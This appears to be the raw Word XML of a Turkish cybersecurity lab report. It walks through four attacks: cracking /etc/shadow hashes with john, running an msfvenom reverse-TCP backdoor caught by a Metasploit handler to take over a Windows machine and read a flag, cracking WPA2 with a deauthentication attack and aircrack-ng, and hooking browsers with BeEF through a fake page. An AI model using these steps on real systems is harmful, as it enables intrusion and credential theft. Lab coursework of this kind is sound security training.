            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1474482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e594e2bf7e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132F9960" w14:textId="4144EDDA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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="61E3C82D" w14:textId="74A3B606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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="57FE58AE" w14:textId="1ACEE1DA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7D137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="44366726" w14:textId="37F6FFD4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2-Hash’leri Topladım:</w:t>
      </w:r>
      <w:r>
        <w:br/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grep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ile kullanıcı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hash’lerini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/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etc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/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shadow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dosyasından çektim. Ardından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unshadow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komutuyla /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etc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/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passwd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dosyasındaki bilgilerle birleştirip kırılabilir hale getirdim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E47A966" w:rsidP="20228653" w:rsidRDefault="7E47A966" w14:paraId="30F78043" w14:textId="739DAC52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7E47A966">
        <w:drawing>
          <wp:inline wp14:editId="6C106215" wp14:anchorId="50291DEC">
            <wp:extent cx="5724524" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1374027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372e89b78e4e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8D4E54">
        <w:drawing>
          <wp:inline wp14:editId="54771066" wp14:anchorId="7824F803">
            <wp:extent cx="5724524" cy="1133492"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1468023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92e64056cb48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876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137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="3F885AD6" w14:textId="1F044278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3-Başlangıçta Kırma Sorunu Yaşadım:</w:t>
      </w:r>
      <w:r>
        <w:br/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john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ile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all.hash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dosyasını kırmayı denedim ancak uzun süre şifreler çözülemedi.</w:t>
      </w:r>
      <w:r>
        <w:br/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Bu durumu fark edince sorunun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algoritmasından kaynaklandığını düşündüm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="01864F83" w14:textId="6D3D315F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7D13738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4-Hash Formatını Kontrol Ettim:</w:t>
      </w:r>
      <w:r>
        <w:br/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john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--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list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=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formats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komutuyla desteklenen algoritmaları kontrol ettim ve ardından sistemi kontrol ederek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hash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algoritmasının ne olduğunu anlamaya çalıştım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="671D4EB3" w14:textId="5BF8653E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7D137385">
        <w:drawing>
          <wp:inline wp14:editId="6C9376C4" wp14:anchorId="619D54EB">
            <wp:extent cx="5724524" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1740350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b7b769041942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137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="0D15F124" w14:textId="6928174B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Bu dosyada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yescrypt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ifadesini sha512 ile </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7D137385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değiştirdim :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53F87F0A" w:rsidP="20228653" w:rsidRDefault="53F87F0A" w14:paraId="4293548F" w14:textId="7FD1E037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53F87F0A">
        <w:drawing>
          <wp:inline wp14:editId="12F3E246" wp14:anchorId="0772898C">
            <wp:extent cx="5724524" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="849957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1c440777ce41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3D986298" w14:textId="55600830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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="44772A02" w14:textId="6E8007A3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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="065B8023" w14:textId="6300B7A4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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="3FC25556" w14:textId="35B28EE5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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="7E8955CF" w14:textId="24DC4F83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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="4E429363" w14:textId="1D410371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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="34023AFD" w14:textId="4D2DF877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20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="6313A794" w14:textId="37ECA81A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</w:p>
    <w:p w:rsidR="53F87F0A" w:rsidP="20228653" w:rsidRDefault="53F87F0A" w14:paraId="4378E27F" w14:textId="60456846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53F87F0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5-Şifre Kırma :</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="53F87F0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Formatın SHA512 olduğunu anladıktan sonra tekrar </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="53F87F0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john</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="53F87F0A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komutunu kullandım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C018EE9" w:rsidP="20228653" w:rsidRDefault="2C018EE9" w14:paraId="7058EF86" w14:textId="40788044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2C018EE9">
        <w:drawing>
          <wp:inline wp14:editId="4F8F057C" wp14:anchorId="4F34475B">
            <wp:extent cx="5724524" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="947055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795139811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18EE9" w:rsidP="20228653" w:rsidRDefault="2C018EE9" w14:paraId="44488A91" w14:textId="5E997A1F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2C018EE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6-Kırılan Şifreler:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Sonunda her iki kullanıcının şifresini başarıyla kırdım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C018EE9" w:rsidP="20228653" w:rsidRDefault="2C018EE9" w14:paraId="70162FD3" w14:textId="2DE004A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testuser</w:t>
      </w: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: </w:t>
      </w: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123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C018EE9" w:rsidP="20228653" w:rsidRDefault="2C018EE9" w14:paraId="1287FAAD" w14:textId="265EE2DF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kullanici</w:t>
      </w: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: </w:t>
      </w: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456789</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Bunları </w:t>
      </w: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--</w:t>
      </w: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>show</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2C018EE9"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  <w:t xml:space="preserve"> komutuyla doğruladım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C018EE9" w:rsidP="20228653" w:rsidRDefault="2C018EE9" w14:paraId="46737771" w14:textId="72AA1DB0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  <w:r w:rsidR="2C018EE9">
        <w:drawing>
          <wp:inline wp14:editId="57E585B0" wp14:anchorId="1013C762">
            <wp:extent cx="5724524" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1629171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371db2ee7949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36FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="35CB5176" w14:textId="39AF949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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="20228653" w:rsidR="7336FBF5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lang w:val="en-US"/>
        </w:rPr>
        <w:t>WİNDOWS İŞLETİM SİSTEMİNE BACKDOOR UYGULAMASI İLE SIZMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="1C0F2CFC" w14:textId="7B10B46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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="043DEBFA" wp14:anchorId="6E551E0A">
            <wp:extent cx="5029200" cy="2181263"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="235989575" name="" descr="Picture 1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1f5cd946184f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24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36FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="20BD8856" w14:textId="7CDDADA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Bu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görselde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,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hedef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Windows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sistemine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sızmak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için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kullanılan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zararlı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yazılım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(windowsbackdoor.exe)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dosyasının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indirilmiş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hali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görülmektedir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.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="416909B2" w14:textId="498B96B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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="78ECA760" wp14:anchorId="2D74B421">
            <wp:extent cx="5029200" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="629897408" name="" descr="Picture 2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efffc94564e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36FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="7E8C8D2E" w14:textId="4DDA07D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Daha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sonra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Kali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Linux'ta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msfvenom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aracı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ile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backdoor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oluştudum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.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Belirli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bir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IP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ve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port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belirterek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bir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reverse TCP payload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hazırladım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ve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.exe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dosyası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olarak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kaydettim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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="76803ED0" w14:textId="724E018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>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="1070444E" w14:textId="27AE6BD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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="7437206C" wp14:anchorId="30194098">
            <wp:extent cx="5029200" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2027815511" name="" descr="Picture 3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e797ea08943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6EB2E162" w14:textId="048C346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</w:pPr>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="49CD97EC" w14:textId="068570F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</w:pPr>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="4C53B5B1" w14:textId="758A0D4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Windows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sistemde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backdoor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dosyasına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çift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tıklayıp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çalıştırmak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istediğimde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SmartScreen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tarafından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uyarı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aldım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. İnternet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bağlantısı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olmadığı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için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dosyanın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güvenliği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değerlendirilememektedir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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="65CEEDDE" w14:textId="3D4FE7B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>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="5740BC16" w14:textId="46C6208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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="1351EEA7" wp14:anchorId="113812D9">
            <wp:extent cx="5029200" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1618038465" name="" descr="Picture 4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f30ea2c39144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36FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="4954E609" w14:textId="294FA58A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Backdoor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dosyası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çalıştırıldıktan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sonra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Kali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tarafında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Metasploit Framework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ile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açılan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listener'a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bağlantı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düşmüş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ve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meterpreter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oturumu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başlamıştır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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="321EE314" w14:textId="0927FA9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>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="367C9AB1" w14:textId="18115676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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="722B98FE" wp14:anchorId="5B684752">
            <wp:extent cx="5029200" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1483944598" name="" descr="Picture 5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b0df493c2340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36FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="016448D7" w14:textId="4230670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Hedef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sistem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windowsbackdoor.exe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dosyasını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Kali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sunucusundan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indirirken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görüntülenmiştir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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="266DCEEC" w14:textId="1191198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>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="48A1FC80" w14:textId="01BC928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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="15652DEC" wp14:anchorId="29EA5524">
            <wp:extent cx="5029200" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67935450" name="" descr="Picture 6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8cc9e7616d4a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7A7B3B8D" w14:textId="4C8B8DA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</w:pPr>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="18BD0821" w14:textId="1D03427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Metasploit'te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kullanılacak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payload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ve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dinlenecek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IP/port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ayarlarını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yapılandırdım.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aşamada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Metasploit Framework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üzerinde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saldırı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dinleyicisini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hazırladım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.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Öncelikle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use exploit/multi/handler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komutunu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kullanarak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geri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bağlantı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(reverse TCP)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alabilmek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için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uygun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modülü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seçtim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.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Ardından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set payload windows/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meterpreter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/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reverse_tcp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komutu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ile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Windows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sistemlerde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çalışacak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olan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Meterpreter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tabanlı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payload’u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belirledim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.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Bağlantının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bana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düşmesi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için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kendi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IP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adresimi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set LHOST 192.168.29.128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komutu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ile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,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dinleyeceğim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portu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ise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set LPORT 12345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komutu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ile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ayarladım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.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Tüm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yapılandırmaları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tamamladıktan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sonra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exploit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komutunu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girerek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dinleyiciyi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başlattım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. Bu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sayede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,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hedef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sistemde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zararlı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dosya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çalıştırıldığında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bağlantı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bana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ulaştı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ve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kontrolü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ele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geçirdim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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="6D309DBD" w14:textId="0478C89C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>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="24488B40" w14:textId="18D6BBBA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7336FBF5">
        <w:drawing>
          <wp:inline wp14:editId="6BA9776A" wp14:anchorId="41EB3B84">
            <wp:extent cx="5029200" cy="4038598"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="584025500" name="" descr="Picture 7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d33bdd56cd45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36FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="4E821B85" w14:textId="2FF1870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Meterpreter shell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komutu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ile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hedef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Windows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makinede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komut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satırına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geçtim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, FLAG.txt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dosyasına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erişerek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içeriği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 xml:space="preserve"> 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okuttum</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7336FBF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  <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="56233167" w14:textId="24CE1997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en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="7AA147DE" w14:textId="0BE23A2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8"/>
          <w:szCs w:val="28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lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Wİ-Fİ ŞİFRE KIRMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="4CE551A4" w14:textId="2180375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1-Ağ Arayüzlerini Gözlemledim:</w:t>
      </w:r>
      <w:r>
        <w:br/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ifconfig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komutu sayesinde sistemdeki tüm ağ arayüzlerini (örneğin: eth0,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lo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, wlan0, wlan0mon) listeledim. Her bir arayüzün IP adresi, MAC adresi, paket gönderim/alımları gibi bilgileri görüntüledim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="29105EFC" w14:textId="20EBC42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="2A13251A">
        <w:drawing>
          <wp:inline wp14:editId="35094D9F" wp14:anchorId="747981C7">
            <wp:extent cx="5715000" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1811224407" name="" descr="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0e7d26f1cf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6381A6D7" w14:textId="19C6B68A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A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="4CED5E36" w14:textId="369E765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2</w:t>
      </w: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-Monitor Modunu Başlattım:</w:t>
      </w:r>
      <w:r>
        <w:br/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İlk olarak kablosuz ağ kartımı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monitor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moda almak için aşağıdaki komutu kullandım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="0495AA04" w14:textId="4A52FED9">
      <w:pPr>
        <w:spacing w:before="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="2A13251A">
        <w:drawing>
          <wp:inline wp14:editId="36EB56CE" wp14:anchorId="0C9BE0DD">
            <wp:extent cx="5286375" cy="4772025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1770511877" name="" descr="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7ee919a59e44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13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="5CA4D585" w14:textId="5C889532">
      <w:pPr>
        <w:spacing w:before="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Daha sonra da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ifconfig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komutunu kullanarak wlan0mon arayüzünü görerek kartın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monitor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moda başarıyla geçtiğini doğruladım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="0C307777" w14:textId="3BB544D0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A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="7F23278A" w14:textId="4E129CEE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="281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  <w:t>3-Kablosuz Ağları Tespit Ettim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="18561C74" w14:textId="7174DF84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>Monitor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 xml:space="preserve"> moddayken çevredeki ağları tespit etmek için:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="169BB346" w14:textId="037930C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A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="09DD8E14" w14:textId="33453D6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="2A13251A">
        <w:drawing>
          <wp:inline wp14:editId="47F3C620" wp14:anchorId="06C7ACC8">
            <wp:extent cx="5715000" cy="4219575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="569139005" name="" descr="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3ed4f6010546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13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="41D506B3" w14:textId="4E7BCC71">
      <w:pPr>
        <w:spacing w:before="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komutunu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kullandım. Bu işlem sonucunda hedefim olan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siberFinalOdevi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ağı dahil çevredeki tüm ağlar listelendi. Aşağıdaki bilgileri edindim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="084D6C74" w14:textId="34E38416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BSSID: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8E:7B:2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B:95:32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:B5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="319BBEC1" w14:textId="0A176DC8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Kanal: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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="183BF625" w14:textId="43095BB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A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="0BCC629A" w14:textId="695C7CCD">
      <w:pPr>
        <w:spacing w:before="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4-Hedef ağa odaklandım ve veri toplamaya başladım</w:t>
      </w:r>
      <w:r>
        <w:br/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Hedef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ğağı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analiz etmek için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airodump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-ng -c 9 --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bssid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8E:7B:2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B:95:32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:B5 -w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handshake_siberFinal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wlan0mon komutunu kullandım. Bu sayede sadece hedef ağı dinledim ve "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handshake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" verisini toplamaya başladım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="3F88825C" w14:textId="774D455A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="2A13251A">
        <w:drawing>
          <wp:inline wp14:editId="372ECED0" wp14:anchorId="4EF79435">
            <wp:extent cx="5715000" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2027180030" name="" descr="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5e4afc7bd840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13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="066AE691" w14:textId="557B9ABB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="281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  <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="420F49E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  <w:t>-</w:t>
      </w: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  <w:t>Deauthentication (Bağlantı Kesme) Saldırısı Gerçekleştirdim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="71418049" w14:textId="5A841E9D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>Handshake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 xml:space="preserve"> yakalayabilmek için hedef cihaza yönelik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>deauth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 xml:space="preserve"> saldırısı uyguladım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="6CECAC8C" w14:textId="5565186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="2A13251A">
        <w:drawing>
          <wp:inline wp14:editId="2AE180A4" wp14:anchorId="0A1B1E7A">
            <wp:extent cx="5715000" cy="1533525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="242467825" name="" descr="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6d76a21879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Bu komutla hedef cihaz bağlantıyı kaybetti ve tekrar bağlandığında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handshake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 paketi başarıyla kaydedildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="54A771BF" w14:textId="37260E00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A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="6530BEAA" w14:textId="1B61B6D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="281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  <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="161696F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  <w:t>-</w:t>
      </w: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  <w:t>Şifreyi Kırdım</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="34C99CC6" w14:textId="08610408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>Handshake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 xml:space="preserve"> dosyası oluşturulduktan sonra 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>aircrack</w:t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  <w:t>-ng aracıyla WPA2 şifresini kırmaya geçtim. Rockyou.txt sözlüğünü kullandım:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="7D00368E" w14:textId="2F8900B0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="2A13251A">
        <w:drawing>
          <wp:inline wp14:editId="476E8575" wp14:anchorId="77EC3509">
            <wp:extent cx="5715000" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1851395674" name="" descr="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6a8e9b7994c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13251A">
        <w:drawing>
          <wp:inline wp14:editId="2651D7B5" wp14:anchorId="0A971145">
            <wp:extent cx="5715000" cy="3371850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1373639099" name="" descr="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2b2054e44f49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13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="430DFBEE" w14:textId="5F4A795B">
      <w:pPr>
        <w:spacing w:before="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Sonuç:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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 xml:space="preserve">Hedef ağın şifresi başarıyla kırıldı. Bulunan şifre: </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2A13251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123456789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A13251A" w:rsidP="20228653" w:rsidRDefault="2A13251A" w14:paraId="7DF6F8EA" w14:textId="04B1D263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2A13251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  <w:t>Bu tüm adımlar sadece görsel olarak verdiğim ekran görüntülerine dayanarak oluşturulmuştur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="7602EDBB" w14:textId="1145B2A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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="018D6E0E" w14:textId="031DCCD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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="47BD8C50" w14:textId="1CD8453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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="539865AE" w14:textId="4711CDB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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="5AA2AD44" w14:textId="303C1762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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="0A867687" w14:textId="61756C7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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="68FEDA19" w14:textId="4F60FCA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0228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="6661CFB4" w14:textId="464DBC9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6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="6B96F2FC" w14:textId="6282B6E2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tr-TR"/>
        </w:rPr>
        <w:t>BEEF UYGULAMASI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="2B0F8941" w14:textId="48C0A6D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</w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="2370E825" w14:textId="0BBA0B08">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after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1.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BeEF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Servisini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Başlatma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="6FF91818" w14:textId="5C66963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</w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="5A420C1E" w14:textId="10111E8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Terminal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üzerinden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`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sudo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beef-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xss`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komutunu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kullanarak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BeEF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aracını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başlattım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.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Komut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sonrası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servis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başarıyla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aktif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hale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geldi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. Web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arayüzüne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bağlanmak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için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gerekli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bağlantı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ve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hook script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bilgileri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ekrana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yansıdı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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="0631EDF1" w14:textId="3AAE6E2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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="173719C6" wp14:anchorId="194CC2AE">
            <wp:extent cx="5029200" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2084605902" name="" descr="Picture 1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398188de44b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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="6E19B3FB" w14:textId="3E6CE7A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after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2. Web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Arayüzüne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Erişim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Sağlama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="4198E566" w14:textId="12B9519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Servisin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başarılı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şekilde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çalıştığını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gördükten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sonra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varsayılan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arayüz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olan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`http://127.0.0.1:3000/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ui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/panel`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adresine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tarayıcımdan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eriştim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.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Giriş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ekranı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sorunsuz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şekilde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açıld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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="5755AB35" w14:textId="4A8F321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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="1837F81E" wp14:anchorId="3923E62B">
            <wp:extent cx="5029200" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42932681" name="" descr="Picture 2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d0eccfac748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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="377EC1DA" w14:textId="1A90A89A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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="0230659E" wp14:anchorId="31A5AAE2">
            <wp:extent cx="5029200" cy="3743325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="991656406" name="" descr="Picture 3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bb7095326344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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="01BAB474" w14:textId="7AD72277">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after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3. Hook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Script'i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HTML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Sayfaya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Yerleştirme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="70E1EA21" w14:textId="7D4EA7D1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/var/www/html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dizinine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giderek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sahte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bir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HTML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sayfa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oluşturdum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ve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içerisine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BeEF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hook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script’ini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ekledim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.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Böylece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bu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sayfa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ziyaret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edildiğinde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hedef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tarayıcı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BeEF’e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bağlanacaktı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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="1D85F4A7" w14:textId="159A0E0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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="01FA137D" wp14:anchorId="273374A5">
            <wp:extent cx="5029200" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
